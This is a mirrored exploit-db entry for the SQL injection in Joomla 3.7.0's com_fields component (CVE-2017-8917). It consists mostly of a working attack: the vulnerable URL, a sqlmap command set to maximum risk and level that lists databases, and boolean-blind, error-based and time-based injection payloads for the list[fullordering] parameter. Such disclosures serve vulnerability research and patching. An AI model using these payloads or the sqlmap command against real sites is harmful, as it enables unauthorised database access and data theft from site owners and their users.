Joomla! 3.7.0 – ‘com_fields’ SQL Injection

  • 作者: Mateus Lino
    日期: 2017-05-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42033/
  • # Exploit Title: Joomla 3.7.0 - Sql Injection
    # Date: 05-19-2017
    # Exploit Author: Mateus Lino
    # Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
    # Vendor Homepage: https://www.joomla.org/
    # Version: = 3.7.0
    # Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
    # CVE : - CVE-2017-8917
    
    
    URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
    
    
    Using Sqlmap: 
    
    sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
    
    
    Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
    
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)